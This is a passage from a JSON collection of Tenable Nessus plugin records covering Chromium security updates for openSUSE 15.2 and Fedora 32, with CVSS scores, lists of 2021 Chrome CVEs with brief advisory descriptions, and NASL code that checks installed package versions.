formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. \n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. \n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening (boo#1182775).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2021-392)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 8.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27844", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-392.NASL", "href": "https://www.tenable.com/plugins/nessus/147606", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-392.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147606);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21149\",\n \"CVE-2021-21150\",\n \"CVE-2021-21151\",\n \"CVE-2021-21152\",\n \"CVE-2021-21153\",\n \"CVE-2021-21154\",\n \"CVE-2021-21155\",\n \"CVE-2021-21156\",\n \"CVE-2021-21157\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2021-392)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nUpdate to 89.0.4389.72 (boo#1182358, boo#1182960) :\n\n - CVE-2021-21159: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21160: Heap buffer overflow in WebAudio.\n\n - CVE-2021-21161: Heap buffer overflow in TabStrip.\n\n - CVE-2021-21162: Use after free in WebRTC.\n\n - CVE-2021-21163: Insufficient data validation in Reader\n Mode.\n\n - CVE-2021-21164: Insufficient data validation in Chrome\n for iOS.\n\n - CVE-2021-21165: Object lifecycle issue in audio.\n\n - CVE-2021-21166: Object lifecycle issue in audio.\n\n - CVE-2021-21167: Use after free in bookmarks.\n\n - CVE-2021-21168: Insufficient policy enforcement in\n appcache.\n\n - CVE-2021-21169: Out of bounds memory access in V8.\n\n - CVE-2021-21170: Incorrect security UI in Loader.\n\n - CVE-2021-21171: Incorrect security UI in TabStrip and\n Navigation.\n\n - CVE-2021-21172: Insufficient policy enforcement in File\n System API.\n\n - CVE-2021-21173: Side-channel information leakage in\n Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in\n Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site\n isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full\n screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in\n Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in\n Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in\n autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in\n navigations.\n\n - CVE-2021-21183: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR\n scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL\n formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in\n payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. \n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. \n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening\n (boo#1182775).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182233\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182358\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182775\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21155\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2023-01-11T14:44:25", "description": "The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome Extension. (CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21189)\n\n - Uninitialized data in PDFium in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted PDF file. (CVE-2021-21190)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-03-22T00:00:00", "type": "nessus", "title": "Fedora 32 : chromium (2021-c88a96bd4b)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2021-C88A96BD4B.NASL", "href": "https://www.tenable.com/plugins/nessus/147941", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2021-c88a96bd4b\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147941);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-21149\",\n \"CVE-2021-21150\",\n \"CVE-2021-21151\",\n \"CVE-2021-21152\",\n \"CVE-2021-21153\",\n \"CVE-2021-21154\",\n \"CVE-2021-21155\",\n \"CVE-2021-21156\",\n \"CVE-2021-21157\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"FEDORA\", value:\"2021-c88a96bd4b\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Fedora 32 : chromium (2021-c88a96bd4b)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 32 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-c88a96bd4b advisory.\n\n - Stack buffer overflow in Data Transfer in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to perform out of bounds memory access via a crafted HTML page. (CVE-2021-21149)\n\n - Use after free in Downloads in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote attacker\n who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21150)\n\n - Use after free in Payments in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially perform a sandbox escape via a crafted HTML page. (CVE-2021-21151)\n\n - Heap buffer overflow in Media in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21152)\n\n - Stack buffer overflow in GPU Process in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote\n attacker to potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21153)\n\n - Heap buffer overflow in Tab Strip in Google Chrome prior to 88.0.4324.182 allowed a remote attacker who\n had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.\n (CVE-2021-21154)\n\n - Heap buffer overflow in Tab Strip in Google Chrome on Windows prior to 88.0.4324.182 allowed a remote\n attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted\n HTML page. (CVE-2021-21155)\n\n - Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.182 allowed a remote attacker to\n potentially exploit heap corruption via a crafted script. (CVE-2021-21156)\n\n - Use after free in Web Sockets in Google Chrome on Linux prior to 88.0.4324.182 allowed a remote attacker\n to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21157)\n\n - Heap buffer overflow in TabStrip in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21159, CVE-2021-21161)\n\n - Heap buffer overflow in WebAudio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21160)\n\n - Use after free in WebRTC in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21162)\n\n - Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page and a malicious server. (CVE-2021-21163)\n\n - Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21164)\n\n - Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit\n heap corruption via a crafted HTML page. (CVE-2021-21165, CVE-2021-21166)\n\n - Use after free in bookmarks in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21167)\n\n - Insufficient policy enforcement in appcache in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21168)\n\n - Out of bounds memory access in V8 in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially perform out of bounds memory access via a crafted HTML page. (CVE-2021-21169)\n\n - Incorrect security UI in Loader in Google Chrome prior to 89.0.4389.72 allowed a remote attacker who had\n compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21170)\n\n - Incorrect security UI in TabStrip and Navigation in Google Chrome on Android prior to 89.0.4389.72 allowed\n a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21171)\n\n - Insufficient policy enforcement in File System API in Google Chrome on Windows prior to 89.0.4389.72\n allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (CVE-2021-21172)\n\n - Side-channel information leakage in Network Internals in Google Chrome prior to 89.0.4389.72 allowed a\n remote attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21173)\n\n - Inappropriate implementation in Referrer in Google Chrome prior to 89.0.4389.72 allowed a remote attacker\n to bypass navigation restrictions via a crafted HTML page. (CVE-2021-21174)\n\n - Inappropriate implementation in Site isolation in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21175)\n\n - Inappropriate implementation in full screen mode in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (CVE-2021-21176)\n\n - Insufficient policy enforcement in Autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21177)\n\n - Inappropriate implementation in Compositing in Google Chrome on Linux and Windows prior to 89.0.4389.72\n allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.\n (CVE-2021-21178)\n\n - Use after free in Network Internals in Google Chrome on Linux prior to 89.0.4389.72 allowed a remote\n attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21179)\n\n - Use after free in tab search in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2021-21180)\n\n - Side-channel information leakage in autofill in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to obtain potentially sensitive information from process memory via a crafted HTML page.\n (CVE-2021-21181)\n\n - Insufficient policy enforcement in navigations in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML\n page. (CVE-2021-21182)\n\n - Inappropriate implementation in performance APIs in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to leak cross-origin data via a crafted HTML page. (CVE-2021-21183, CVE-2021-21184)\n\n - Insufficient policy enforcement in extensions in Google Chrome prior to 89.0.4389.72 allowed an attacker\n who convinced a user to install a malicious extension to obtain sensitive information via a crafted Chrome\n Extension. (CVE-2021-21185)\n\n - Insufficient policy enforcement in QR scanning in Google Chrome on iOS prior to 89.0.4389.72 allowed an\n attacker who convinced the user to scan a QR code to bypass navigation restrictions via a crafted QR code.\n (CVE-2021-21186)\n\n - Insufficient data validation in URL formatting in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to perform domain spoofing via IDN homographs via a crafted domain name. (CVE-2021-21187)\n\n - Use after free in Blink in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (CVE-2021-21188)\n\n - Insufficient policy enforcement in payments in Google Chrome prior to 89.0.4389.72 allowed a remote\n attacker to bypass navigation 